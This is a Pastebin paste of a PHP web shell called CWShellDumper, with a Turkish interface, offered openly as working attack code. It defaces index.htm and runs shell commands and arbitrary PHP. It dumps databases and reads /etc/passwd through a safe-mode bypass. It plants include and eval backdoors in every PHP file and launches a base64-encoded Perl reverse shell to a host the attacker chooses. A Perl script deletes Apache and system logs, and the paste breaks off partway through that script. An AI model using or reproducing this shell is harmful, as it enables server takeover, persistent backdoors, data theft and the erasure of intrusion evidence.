FlyFar

CWShellDumper

Feb 9th, 2024
61
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 40.83 KB | Cybersecurity | 0 0
  1. <?php
  2. $entry_line="r57.biz";
  3. $fp = fopen("index.htm", "w");
  4. fputs($fp, $entry_line);
  5. fclose($fp);
  6. #GreetZ:SultanMehmed
  7.  
  8. // Variables
  9.    $info = @$_SERVER['SERVER_SOFTWARE'];
  10.    $page = @$_SERVER['SCRIPT_NAME'];
  11.    $site = getenv("HTTP_HOST");
  12.    $uname = php_uname();
  13.    $smod = ini_get('safe_mode');
  14.            if ($smod == 0) { $safemode = "<font color='lightgreen'>KAPALI</font>"; }
  15.            else { $safemode = "<font color='red'>ACIK</font>";      }
  16.    $dir = @realpath($_POST['dir']);
  17.    $mkdir = @$_POST['makedir'];
  18.    $mydir = @$_POST['deletedir'];
  19.    $cmd = @$_GET['cmd'];
  20.    $host = @$_POST['host'];
  21.    $proto = @$_POST['protocol'];
  22.    $delete = @$_POST['delete'];
  23.    $phpeval = @$_POST['php_eval'];
  24.    $db = @$_POST['db'];
  25.    $query = @$_POST['query'];
  26.    $user = @$_POST['user'];
  27.    $pass = @$_POST['passd'];
  28.    $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
  29.    
  30.  
  31.    $quotes = get_magic_quotes_gpc();
  32. if ($quotes == "1" or $quotes == "on")
  33.    {
  34.        $quot = "<font color='red'>ACIK</font>";
  35.    }
  36.    else
  37.    {
  38.        $quot = "<font color='lightgreen'>KAPALI</font>";
  39.    }
  40.    // Perms
  41.     function getperms($fn)
  42. {
  43. $mode=fileperms($fn);
  44. $perms='';
  45. $perms .= ($mode & 00400) ? 'r' : '-';
  46. $perms .= ($mode & 00200) ? 'w' : '-';
  47. $perms .= ($mode & 00100) ? 'x' : '-';
  48. $perms .= ($mode & 00040) ? 'r' : '-';
  49. $perms .= ($mode & 00020) ? 'w' : '-';
  50. $perms .= ($mode & 00010) ? 'x' : '-';
  51. $perms .= ($mode & 00004) ? 'r' : '-';
  52. $perms .= ($mode & 00002) ? 'w' : '-';
  53. $perms .= ($mode & 00001) ? 'x' : '-';
  54. return $perms;
  55. }
  56.  // milw0rm Search (locushell)
  57.  
  58. $Lversion = @php_uname('r');
  59. $OSV = @php_uname('s');
  60. if(eregi('Linux',$OSV))
  61. {
  62. $Lversion=substr($Lversion,0,6);
  63. $millink="http://milw0rm.com/search.php?dong=Linux Kernel".$Lversion;
  64.  
  65. }else{
  66. $Lversion=substr($Lversion,0,3);
  67. $millink="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
  68. }
  69. if(isset($_POST['milw0'])) { echo "<script>window.location='".$millink."'</script>"; }
  70.    //Space
  71.    $spacedir = @getcwd();
  72.    $free = @diskfreespace($spacedir);
  73.    
  74. if (!$free) {$free = 0;}
  75.    $all = @disk_total_space($spacedir);
  76. if (!$all) {$all = 0;}
  77. function view_size($size)
  78. {
  79.  if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
  80.  elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
  81.  elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
  82.  else {$size = $size . " B";}
  83.  return $size;
  84. }
  85. $percentfree = intval(($free*100)/$all);
  86.  
  87.  
  88. // PHPinfo
  89. if(isset($_POST['phpinfo']))
  90. {
  91. die(phpinfo());
  92. }
  93.    
  94.  
  95. // Make File
  96.  
  97.    $name = htmlspecialchars(@$_POST['names']);
  98.    $src = @$_POST['source'];
  99.     if(isset($name) && isset($src))
  100.       {
  101.       if($_POST['darezz'] != realpath("."))  { $name = $_POST['darezz'].$name; }
  102.    $ctd = fopen($name,"w+");
  103.    fwrite($ctd, $src);
  104.    fclose($ctd);
  105.    echo "<script>alert('Uploaded')</script>";
  106.       }
  107.  
  108. // Upload File
  109.    $path = @$_FILES['ffile']['tmp_name'];
  110.    $name = @$_FILES['ffile']['name'];
  111.    if(isset($path) && isset($name))
  112. {  
  113. if($_POST['dare'] != realpath("."))  { $name = $_POST['dare'].$name; }
  114.    if(move_uploaded_file($path, $name))
  115.    {
  116.       echo "<script>alert('Uploaded')</script>";
  117.    }
  118.    else
  119.    {
  120.       echo "<script>alert('Error')</script>";
  121. }   }
  122.  
  123. // Delete File
  124.  
  125.    
  126.    if(isset($delete) && $delete != $dir)
  127. {
  128.       if(file_exists($delete))
  129.       {
  130.          unlink($delete);
  131.          echo "<script>alert('File Deleted')</script>";
  132.       }
  133.  
  134. }
  135.  
  136. // Database
  137.    
  138.    if(isset($db) && isset($query) && isset($_POST['godb']))
  139. {
  140.    $mysql = mysql_connect("localhost", $user, $pass)or die("<script>alert('Connection Failed')</script>");
  141.    $db = mysql_select_db($db)or die(mysql_error());
  142.    $queryz = mysql_query($query)or die(mysql_error());
  143. if($query) { echo "<script>alert('Done')</script>"; }
  144. else { echo "<script>alert('Error')</script>"; }
  145. }
  146.  
  147. // Dump Database [pacucci.com]
  148. if(isset($_POST['dump']) && isset($user) && isset($pass) && isset($db)){
  149. mysql_connect('localhost', $user, $pass);
  150. mysql_select_db($db);
  151. $tables = mysql_list_tables($db);
  152. while ($td = mysql_fetch_array($tables))
  153. {
  154. $table = $td[0];
  155. $r = mysql_query("SHOW CREATE TABLE `$table`");
  156. if ($r)
  157. {
  158. $insert_sql = "";
  159. $d = mysql_fetch_array($r);
  160. $d[1] .= ";";
  161. $SQL[] = str_replace("\n", "", $d[1]);
  162. $table_query = mysql_query("SELECT * FROM `$table`");
  163. $num_fields = mysql_num_fields($table_query);
  164. while ($fetch_row = mysql_fetch_array($table_query))
  165. {
  166. $insert_sql .= "INSERT INTO $table VALUES(";
  167. for ($n=1;$n<=$num_fields;$n++)
  168. {
  169. $m = $n - 1;
  170. $insert_sql .= "'".mysql_real_escape_string($fetch_row[$m])."', ";
  171. }
  172. $insert_sql = substr($insert_sql,0,-2);
  173. $insert_sql .= ");\n";
  174. }
  175. if ($insert_sql!= "")
  176. {
  177. $SQL[] = $insert_sql;
  178. }
  179. }
  180. }
  181. $dump = "-- Database: ".$_POST['db'] ." \n";
  182. $dump .= "-- CWShellDumper v3\n";
  183. $dump .= "-- r57.biz\n";
  184. $dumpp = $dump.implode("\r", $SQL);
  185. $name = $db."-".date("d-m-y")."cyberwarrior.sql";
  186. Header("Content-type: application/octet-stream");
  187. Header("Content-Disposition: attachment; filename = $name");
  188. echo $dumpp;
  189. die();
  190. }
  191.  
  192. // Make Dir
  193. if(isset($mkdir)) {
  194.  
  195. mkdir($mkdir);
  196. if($mkdir) { echo "<script>alert('Tamamd�r.')</script>"; } }
  197.  
  198. // Delete Directory
  199.  
  200. if(isset($mydir) && $mydir != "$dir") {
  201. $d = dir($mydir);
  202. while($entry = $d->read()) {
  203.  if ($entry !== "." && $entry !== "..") {
  204.  unlink($entry);
  205.  }
  206. }
  207. $d->close();
  208. rmdir($mydir);
  209.  
  210. }
  211.  
  212. //Infect Files [RFI]
  213.  
  214. if(isset($_POST['inf3ct']))
  215. {
  216. foreach (glob("*.php") as $lola)
  217. {
  218. $dira = '.';
  219. $asdi = fopen($lola, 'a+');
  220. @fwrite($asdi, '
  221. <?php
  222. include($_GET[\'pwn\']);
  223. ?>');
  224. @fclose($asdi);
  225. }
  226. if($asdi)
  227. {
  228. $textzz = '<font size=2 color=lightgreen>Oldu:<br> ?pwn=[shell]</font>';
  229. }
  230. else {
  231. $textzz = '<font size=2 color=red>HATA! (Permlere Dikkat Et..)</font>';
  232. }
  233. }
  234.  
  235. //Infect Files [Eval]
  236. if(isset($_POST['evalinfect']))
  237. {
  238. foreach (glob("*.php") as $lal)
  239. {
  240. $dira = '.';
  241. $axd = fopen($lal, 'a+');
  242. @fwrite($axd, '
  243. <?php
  244. eval(stripslashes($_GET[\'eval\']));
  245. ?>');
  246. @fclose($axd);
  247. }
  248. if($axd)
  249. {
  250. $textz0 = '<font size=2 color=lightgreen>Oldu:<br> ?eval=[eval]</font>';
  251. }
  252. else {
  253. $textz0 = '<font size=2 color=red>HATA! (Permler IZIn Vermior..)</font>';
  254. }
  255. }
  256.  
  257. // Images
  258.    if(@$_GET['com'] == "image")
  259.    {
  260.    $images = array(
  261.    "folder"=> "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABmJLR0QAAAAAAAD5Q7t/AAAACXBIWXMAAA3XAAAN1wFCKJt4AAAAB3RJTUUH1QsKEjkN+d1wUAAAAX9JREFUOMulkU2IUlEYhp9jKv5AposQWgRBtA6CmSCa5SzjYhG0qYggiP6Y3WxmtrMIol1QM84qRKRlSVC2bBcYRpuIIigFC7F7j0fP/WZx7QriBc2XDw6cw/e8L+9Rly6XtorF4jZTMsYE58Dc2tvdf0KE1J17t+X61RszH7X2eLb3lF6vd6VaqT2PBJSci7Q+taJMeNt4M331qFqpPQCIA6TTGY7k8pEA50IpcFMKpRS1F9X7QAAwxuB5Lq8/9ml2Msylww5nbjpSSOnPYYJmJ8PjjXW0sXMxUslD3H1YPxUH8DwXgJ+/NV/af+cCnDiaBSCmtSadnjP6DMVc1w0T/BfgXwdLARZNYK2PHgZlh7+QiPkIICIopRARRMAXwVphaH3MSBiMLEMr5LLJCcDzXI7nBnT7hh9dD0ThI4wHERAEkTEYGFmZAH512pw+e44PX/+MlwJ3EfARBAUiYaqVkwXqL1+R19/L6vy1nYabOLa2aHnZ4bf378qbqyyrA8KHtMqnsOL4AAAAAElFTkSuQmCC",
  262.    "file"=> "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAP3SURBVHjaYtxx5BYDIwMUMDLESIjyTeRiZ2H4//8/WOgvEP/69Zfh5+9/DI8ev3jx9NGDKAYmpovc/MIMc6e0MwAEEAszEyPDP6h+pn9/ORWkBYV4OVlhRjL8Bprz5etfhncfPjP8l5IQ4uVh33Lt2i1foAUXQPIAAcSirC3F8PoXI8N7JmaGrw9f//z67S8DCzMrAwvjPwZWVkYGpv+MDIxAJzIB5VlZGBgsjTRlWFiYN99//BpsCEAAsbCxsTCwMjEx/P3NZPmcSTB2/UNmBsb//xi+fv3DoCH8l8FFlZmBg4WVgZ2dleHHr98Ml27cY/jPwCzDxc23BejLQIAAAEEAvv8CAwH/APT1/l/l7P+/IRwHREEtBQAmJgIA+g4GAKHUBgCGufQA9fb1AAgFAwASEAwA9ff+AOjr8QAFBgob/Pz9YQKI6ePP/7qH7zBP5GJhYtfjZ2KQAnqfCehUoIUMnFzMDBuv8TAsOPSeAWgk0GvMDNxc7AxCvOwM4sI8QJf8/wsQQCzbb/9L/vGLgd9KkoHh03cGhku/GBhefmVg+AjEQHFgxDAzrDr4ncFK/jkDDxcfMDwYGbi4OBhYgF4HBs1/gABiOnf9p/mrT78ZXv9hYHj3m4Hh8hMGhquPGBgevmRgeP+NgeHP5+8Mty98ZLj++D0DK/N/Bm4OdmDA/mDg52QDxztAADG9fPyDb/eRDwzTjvxmAJrBYAx0yV+gzfeBBvz68pfh64PXDOxcrAx//4Jih4mBDRgVPDxAlwDZoNgBCCCmPz//Pn15+iXDiyufGF5+ANnAwMD66yfDzcNPGIS/vWb4+uITAycvE1icmQUYlaysDF8/vwMGKhM4nQAEENOz84t2i4mJMHiYcDNI8DMyCAJdZi4FjB9LVgZ9VW4GEWleBgWJHwxSQEOYgdH5H5jsRETFGf4D0wUorQIEENODQ5MWq2h9uSUty8EgJcDAIMfOwOCpy8FQkibOoKbOy+AaKMbgYfiRQVxEDOhkFgZmYJp58fwJMGj/AkOAkQEggFh+fHj54uLq1PhTurMXPXqkpsr5+QMDDzczA5cML8OzN58YBN+dY7DSEGLgFxJl+AUMh3///jDIysgDww/kgv8MAAHEDPLH19ePnpzcsmzLzduvFT4zKGucOP+M4ffnZwyKrI8ZbDVEGBSUNYDqgRr+/WdgAtL37txgEAZ6Y9XKlacAAogFlmn+fnt3X+bv6e0L6tr8P757B4yJvwzcvIIMbBycDH+Bnv0NzI3ADMHw5+8/Bg1dYwYmNmB+YWXlAAggRE4GxsnUeev09+zalvDsySOgwYzgDA2y9T/Df3juBDFBPBYWNsbbN86fBAgwAD3nU17W2F2kAAAAAElFTkSuQmCC",
  263.    "floppy"=> "R0lGODlhECAQILMgIB8jVq2yyI0csGVuGcjL2v///9TY405WfqOmvjI+bHoaoQsMQxR+uubn7bu+0f///yH5BAEgIA8gLCAgICAQIBAgIAR/8CHEHlVq6HMZNEUYJGFZMiACFtxpCiBDHgLjEwogzLfZDAuBw0AsEn0eIAKocAR+E0Yls1koAn2skjLFDA7WQKlBJh6z4AEiVDZneDDFrNEwE95QRHwgaFOdSlx6CwcKdndOUQxxJgZgFgIYCjALCQN/eRUWIAsPIHggoSCdESA7"
  264.    );
  265. header("Content-type: image/gif");
  266. header("Cache-control: public");
  267. header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  268. header("Cache-control: max-age=".(60*60*24*7));
  269. header("Last-Modified: ".date("r",filemtime(__FILE__)));
  270. $image = $images[$_GET['img']];
  271.  echo  base64_decode($image);
  272.  }
  273. //File List
  274.  
  275.    chdir($dir);
  276.    if(!isset($dir)) { $dir = @realpath("."); }
  277.     if($dir != "/") { $dir = @realpath("."); } else { $dir = "."; }
  278.    if (substr($dir,-1) != DIRECTORY_SEPARATOR) {$dir .= DIRECTORY_SEPARATOR;}
  279.    $pahtw = 0;
  280.    $filew = 0;
  281.    $num = 1;
  282.  
  283.    if (is_dir($dir))
  284.    {
  285.       if ($open = opendir($dir))
  286.       {
  287.       if(is_dir($dir)) {
  288.    $typezz = "DIR";
  289.    $pahtw++;
  290.  }
  291.          while (($list = readdir($open)) == true)
  292.          {
  293.          
  294.          if(is_dir($list)) {
  295.    $typezz = "DIR";
  296.    $pahtw++;
  297.    @$listf.= '<tr><td valign=top><img src=?com=image&img=folder><font size=2 face=Verdana>['.$list.']<td valign=top><font size=2 face=Verdana>'.$typezz.'</font></td><td valign=top></td><td valign=top><font size=2 face=Verdana>' . getperms($list) .'</font></td></tr>'; }
  298. else {
  299.  
  300.    $lolz = filesize($list) / 1024;
  301.    $lolx = intval($lolz);
  302.    if($lolx == 0) { $lolx = 1; }
  303.    $typezz = "DOSYA";
  304.    $filew++;
  305.    $listz = "/".$list;
  306.    if(eregi($page,$listz)) {    @$listf.= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana color=yellow>'.$list.'<td valign=top><font size=2 face=Verdana>'.$typezz.'</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx .' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'; }
  307.    elseif(eregi('config',$listz) && eregi('.php',$listz)) { @$listf.= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana><b>'.$list.'</b><td valign=top><font size=2 face=Verdana>'.$typezz.'</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx .' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'; }
  308.    else {@$listf.= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana>'.$list.'<td valign=top><font size=2 face=Verdana>'.$typezz.'</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx .' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'; }  }
  309.    
  310.    }        
  311.    closedir($open);
  312.          
  313.       }
  314. $fileq = $pahtw + $filew;   }
  315.  
  316.  
  317.  
  318.  
  319. echo "<html>
  320. <head>
  321. <style>
  322. table.menu {
  323. border-width: 0px;
  324.   border-spacing: 1px;
  325.   border-style: solid;
  326.   border-color: #a6a6a6;
  327.   border-collapse: separate;
  328.   background-color: rgb(98, 97,97);
  329. }
  330. table.menuz {
  331. border-width: 0px;
  332.   border-spacing: 1px;
  333.   border-style: solid;
  334.   border-color: #a6a6a6;
  335.   border-collapse: separate;
  336.   background-color: rgb(98, 97,97);
  337. }
  338. table.menu td {
  339.   border-width: 1px;
  340.   padding: 1px;
  341.   border-style: none;
  342.   border-color: #333333;
  343.   background-color: #000000;
  344.   -moz-border-radius: 0px;
  345. }
  346. table.menuz tr {
  347.   border-width: 1px;
  348.   padding: 1px;
  349.   border-style: none;
  350.   border-color: #333333;
  351.   background-color: #000000;
  352.   -moz-border-radius: 0px;
  353. }
  354.  
  355. table.menuz tr:hover {
  356.     background-color: #111111;
  357. }
  358. input,textarea,select {
  359. font: normal 11px Verdana, Arial, Helvetica, sans-serif;
  360. background-color:black;
  361. color:#a6a6a6;
  362. border: solid 1px #363636;
  363. }
  364. </style>
  365.  
  366. </head>
  367. <body bgcolor='#000000' text='#ebebeb' link='#ebebeb' alink='#ebebeb' vlink='#ebebeb'>
  368. <table style='background-color:#333333; border-color:#a6a6a6' width=100% border=0 align=center cellpadding=0 cellspacing=0>
  369. <tr><td>
  370. <center><b><font size='6' face='Webdings'>�</font>
  371. <font face='Verdana' size='5'><a href='".@$_SERVER['HTTP_REFERER']."'>~ CWShell ~</font></a>
  372. <font size='6' face='Webdings'>�</font></b>
  373. </center>
  374. </td></tr></table><table class=menu width=100%<tr><td>
  375. <font size='1' face='Verdana'><b>Site:  </b><u>$site</u> <br>
  376. <b>Server Name: </b><u>" . $_SERVER['SERVER_NAME'] . "</u> <br>
  377. <b>Server Bilgisi : </b> <u>$info</u> <br>
  378. <b>Uname -a:</b> <u>$uname</u> <br>
  379. <b>Klas�r:</b> <u>" . $_SERVER['DOCUMENT_ROOT'] . "</u> <br>
  380. <b>Safe Mode:</b>  <u>$safemode</u> <br>
  381. <b>Sihirli Sozler:</b> <u>$quot</u> <br>
  382. <b>Sayfa:</b> <u>$page</u><br>
  383. <b>Bo� Alan:</b> <u>" . view_size($free) . " [ $percentfree% ]</u> <br>
  384. <b>Toplam Alan:</b> <u>" . view_size($all) . "</u> <br>
  385. <b>IP:</b> <u>" . $_SERVER['REMOTE_ADDR'] ."</u> - Server IP:</b> <a href='http://whois.domaintools.com/". $_SERVER['SERVER_ADDR'] ."'>".$_SERVER['SERVER_ADDR']."</a></td></tr>
  386. <tr><td><form method='post' action=''>
  387. <center><input type=submit value='File List' name=filelist> - <input type=submit value='View PhpInfo' name=phpinfo> - <input type=submit value='Encoder' name='encoder'> - <input type='submit' value='Send Fake Mail' name='mail'> - <input type='submit' value='Cmd Execution' name='commex'> - <input type='submit' name='logeraser' value='Logs Eraser'> - <input type='submit' name='connectback' value='Connect Back'> - <input type='submit' name='safemodz' value='Safe Mode Bypass'> - <input type='submit' name='milw0' value='Milw0rm Search'></center></td></tr>";
  388. // Safe Mode Bypass
  389. if(isset($_POST['safemodz']))
  390. {
  391. echo "<tr><td valign=top width=50%>
  392. <center><b><font size='2' face='Verdana'>Safe-Mode Bypass[Dosyalar]<br></font></b>
  393. <form action='' method='post'>
  394.      <font size='1' face='Verdana'>Dosya ad�:</font><br> <input type='text' name='filew' value='/etc/passwd'> <input type='submit' value='Dosyay� Oku' name='redfi'><br>
  395.       </td><tr>
  396. <td valign=top>
  397. <center><b><font size='2' face='Verdana'>Safe-Mode Bypass [Klas�rler]<br></font></b>
  398.   <form method='post' action=''>
  399.   <font size='1' face='Verdana'>Klas�r:</font><br>
  400.   <input type='text' name='directory'> <input type='submit' value='Listele' name='reddi'>";
  401.   }
  402.    // Safe Mode Bypass: File
  403. if(isset($_POST['redfi']))
  404. {
  405.     $test='';
  406.     $tempp= tempnam($test, "cx");
  407.     $get = htmlspecialchars($_POST['filew']);
  408.     if(copy("compress.zlib://".$get, $tempp)){
  409.     $fopenzo = fopen($tempp, "r");
  410.     $freadz = fread($fopenzo, filesize($tempp));
  411.     fclose($fopenzo);
  412.     $source = htmlspecialchars($freadz);
  413.     echo "<tr><td><center><font size='1' face='Verdana'>$get</font><br><textarea rows='20' cols='80' name='source'>$source</textarea>";
  414.     unlink($tempp);
  415.     } else {
  416.     echo "<tr><td><center><font size='1' color='red' face='Verdana'>HATA</font>";
  417.             }
  418.    
  419. }
  420.  
  421. // Safe Mode Bypass: Directory
  422.  if(isset($_POST['reddi'])){
  423.    
  424. function dirz()
  425. {
  426. $dirz = $_POST['directory'];
  427. $files = glob("$dirz*");
  428.  
  429. foreach ($files as $filename) {
  430.     echo "<tr><td><font size='1' face='Verdana'>";
  431.    echo "$filename\n";
  432.    echo "</font><br>";
  433. }
  434. }
  435. echo "<br>"; dirz();
  436. }
  437.  
  438. // Connect Back
  439. if(isset($_POST['connectback']))
  440. {
  441. echo "
  442. <tr><td>
  443. <center><font size='2' face='Verdana'><b>Back-Connect</b><br></font>
  444. <form method='post' action=''><input type='text' name='connhost' size='15'value='target'> <input type='text' name='connport' size='5' value='port'> <input type='submit' name='connsub' value='Run'></form>";
  445. }
  446. if(isset($_POST['logeraser']))
  447. {
  448. echo "<tr><td>
  449. <center><b><font size='2' face='Verdana'>:: OS ::<br></font></b>
  450.        <select name=functionp>
  451.          <option>linux</option>
  452.          <option>sunos</option>
  453.          <option>aix</option>
  454.          <option>irix</option>
  455.          <option>openbsd</option>
  456.           <option>solaris</option>
  457.           <option>suse</option>
  458.           <option>lampp</option>
  459.           <option>debian</option>
  460.           <option>freebsd</option>
  461.           <option>misc</option>
  462.        </select><br><input type='submit' name='runer' value='Erase'></table>";
  463.         }
  464.        
  465. // Connect Back
  466. if(isset($_POST['connsub']))
  467. {
  468. $sources = base64_decode("CiMhL3Vzci9iaW4vcGVybAp1c2UgU29ja2V0OwoKJGV4ZWN1dGU9J2VjaG8gIkhlcmUgaSBhbSI7ZWNobyAiYHVuYW1lIC1hYCI7ZWNobyAiYHVwdGltZWAiOy9iaW4vc2gnOwoKJHRhcmdldD0kQVJHVlswXTsKJHBvcnQ9JEFSR1ZbMV07CiRpYWRkcj1pbmV0X2F0b24oJHRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOwokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOwokcHJvdG89Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOwpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7CmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsKb3BlbihTVERJTiwgIj4mU09DS0VUIik7Cm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsKb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOwpzeXN0ZW0oJGV4ZWN1dGUpOwpjbG9zZShTVERJTik7CmNsb3NlKFNURE9VVCk7IA==");
  469. $openz = fopen("cbs.pl", "w+")or die("Error");
  470. fwrite($openz, $sources)or die("Error");
  471. fclose($openz);
  472. $aids = passthru("perl cbs.pl ".$_POST['connhost']." ".$_POST['connport']);
  473. unlink("cbs.pl");
  474. }
  475. if(isset($_POST['connsub'])) { echo "<tr><td><font color='lightgreen' face='Verdana' size='2'>Done.</font>"; }
  476.  
  477.         // Logs Eraser
  478. if(isset($_POST['runer']))
  479. {
  480. echo "<tr><td><center><textarea cols='30' rows='2'>";
  481. $erase = base64_decode("#!usr/bin/perl
# CWSHell
       chomp($os = $ARGV[0]);

                if($os eq \"misc\"){ #If misc typed, do the following and start brackets
             print \"[+]misc Selected...\\n\";   
             sleep 1;
             print \"<tr>[+]Logs Located...\\n\";
             sleep 1;
             $a = unlink @misc;   
             sleep 1;
			 
            if($a) { print \"[+]Logs Successfully Deleted...\\n\"; }
			else { print \"[-]Error\"; }
              }

                if($os eq \"openbsd\"){ #If openbsd typed, do the following and start brackets
             print \"[+]openbsd Selected...\\n\";
             sleep 1;
             print \"[+]Logs Located...\\n\";   
             sleep 1;
             $b = unlink @openbsd;   
             sleep 1;
            if($b) {print \"[+]Logs Successfully Deleted...\\n\";   }
			else { print \"[-]Error\"; }
              }

                if($os eq \"freebsd\"){ #If freebsd typed, do the following and start brackets
             print \"[+]freebsd Selected...\\n\";   
             sleep 1;
             print \"[+]Logs Located...\\n\";   
             sleep 1;
             $c = unlink @freebsd;   
             sleep 1;
             if($c) { print \"[+]Logs Successfully Deleted...\\n\"; }
			 else { print \"[-]Error\"; }
              }

                if($os eq \"debian\"){ #If Debian typed, do the following and start brackets
             print \"[+]debian Selected...\\n\";
             sleep 1;
             print \"[+]Logs Located...\\n\";
             sleep 1;
             $d = unlink @debian;   
             sleep 1;
             if($d) { print \"[+]Logs Successfully Deleted...\\n\"; }
			  else { print \"[-]Error\"; }
              }

                if($os eq \"suse\"){ #If suse typed, do the following and start brackets
             print \"[+]suse Selected...\\n\";
             sleep 1;
             print \"[+]Logs Located...\\n\";
             sleep 1;
             $e = unlink @suse;   
             sleep 1;
            if($e) { print \"[+]Logs Successfully Deleted...\\n\"; }
			 else { print \"[-]Error\"; }
              }

                if($os eq \"solaris\"){ #If solaris typed, do the following and start brackets
             print \"[+]solaris Selected...\\n\";
             sleep 1;
             print \"[+]Logs Located...\\n\";
             sleep 1;
             $f = unlink @solaris;
             sleep 1;
             if($f) {print \"[+]Logs Successfully Deleted...\\n\"; }
			 else { print \"[-]Error\"; }
              }

                if($os eq \"lampp\"){ #If lampp typed, do the following and start brackets
             print \"[+]Lampp Selected...\\n\";
             sleep 1;
             print \"[+]Logs Located...\\n\";
             sleep 1;
             $g = unlink @lampp;
             sleep 1;
            if($g) { print \"[+]Logs Successfully Deleted...\\n\"; }
		    else { print \"[-]Error\"; }
              }

                if($os eq \"redhat\"){ #If redhat typed, do the following and start brackets
             print \"[+]Red Hat Linux/Mac OS X Selected...\\n\";
             sleep 1;
             print \"[+]Logs Located...\\n\";
             sleep 1;
             $h = unlink @redhat;
             sleep 1;
             if($h) { print \"[+]Logs Successfully Deleted...\\n\"; }
			  else { print \"[-]Error\"; }
              }
       
                if($os eq \"linux\"){ #If linux typed, do the following and start brackets
             print \"[+]Linux Selected...\\n\";   
             sleep 1;
             print \"[+]Logs Located...\\n\";
             sleep 1;
             $i = unlink @linux;
             sleep 1;
			if($i) { print \"[+]Logs Successfully Deleted...\\n\";} 
			else { print \"[-]Error\"; }
		}      
             
              if($os eq \"sunos\"){ #If sunos typed, do the following and start brackets
              print \"[+]SunOS Selected...\\n\";
              sleep 1;
              print \"[+]Logs Located...\\n\";
              sleep 1;
              $l = unlink @sunos;
              if($l) { print \"[+]Logs Successfully Deleted...\\n\"; }
			  else { print \"[-]Error\"; }
              }   
               
              if($os eq \"aix\"){ #If aix typed, do the following and start brackets
                 print \"[+]Aix Selected...\\n\";
                 sleep 1;
              print \"[+]Logs Located...\\n\";
              sleep 1;
              $m = unlink @aix;
              if($m) { print \"[+]Logs Successfully Deleted...\\n\"; }
			   else { print \"[-]Error\"; }
              }
             
              if($os eq \"irix\"){ #If irix typed, do the following and start bracket
              print \"[+]Irix Selected...\\n\";
              sleep 1;
              print \"[+]Logs Located...\\n\";
              sleep 1;
              $n = unlink @irix;   
              if($n) { print \"[+]Logs Successfully Deleted...\\n\"; }
			  else { print \"[-]Error\"; }
              }

                                #Misc Log Locations   
      {                       
      @misc = (\"/etc/httpd/logs/access.log\", \"/etc/httpd/logs/error.log\",\"/etc/httpd/logs/access_log\",
            \"/etc/httpd/logs/error_log\",\"/usr/local/apache/logs/access_log\",\"/usr/local/apache/logs/error_log\",
            \"/usr/local/apache/logs/access.log\",\"/usr/local/apache/logs/error.log\",\"/var/log/apache/access_log\",
            \"/var/log/apache/error_log\",\"/var/log/apache/access.log\",\"/var/log/apache/error.log\",\"/var/log/access_log\",
            \"/var/log/error_log\",\"/var/www/logs/error.log\",\"/var/www/logs/access.log\",\"/var/www/logs/error_log\",
            \"/var/www/logs/access_log\")
         }

                                 #Logs of OpenBSD Systems
   
      {
       @openbsd = (\"/var/www/log/access_log\", \"/var/www/log/error_log\")
           }

                                 #Logs of FreeBSD Systems
   
      {
       @freebsd = (\"/usr/local/etc/httpd/logs/access_log\", \"/usr/local/etc/httpd/logs/error_log\")
           }

                                 #Logs of Debian Systems
   
      {
       @debian = (\"/var/log/apache/access.log\", \"/var/log/apache/error.log\",
       \"/var/log/apache-ssl/error.log\", \"/var/log/apache-ssl/access.log\")
           }   

                                 #Logs of SuSE Linux Systems
   
      {
       @suse = (\"/var/log/httpd/access_log\", \"/var/log/httpd/error_log\")
           }

                                 #Logs of Solaris Systems
   
      {   
       @solaris = (\"/var/apache/logs/access_log\", \"/var/apache/logs/error_log\")
           }

                                 #Logs of Lampp Systems
   
      {
       @lampp = (\"/opt/lampp/logs/error_log\", \"/opt/lampp/logs/access_log\")
           }

                                 #Logs of Red Hat, Mac OS X Systems
   
      {
       @redhat = (\"/var/log/httpd/access_log\", \"/var/log/httpd/error_log\")
           }
               
                                 #Logs of Irix Systems
   
      {
       @irix = (\"/var/adm/SYSLOG\", \"/var/adm/sulog\", \"/var/adm/utmp\", \"/var/adm/utmpx\",
              \"/var/adm/wtmp\", \"/var/adm/wtmpx\", \"/var/adm/lastlog/\",
            \"/usr/spool/lp/log\", \"/var/adm/lp/lp-errs\", \"/usr/lib/cron/log\",
            \"/var/adm/loginlog\", \"/var/adm/pacct\", \"/var/adm/dtmp\",
            \"/var/adm/acct/sum/loginlog\", \"var/adm/X0msgs\", \"/var/adm/crash/vmcore\",
            \"/var/adm/crash/unix\")
           }

                                #Log sof Aix Systems
      {   
      @aix = (\"/var/adm/pacct\", \"/var/adm/wtmp\", \"/var/adm/dtmp\", \"/var/adm/qacct\",   
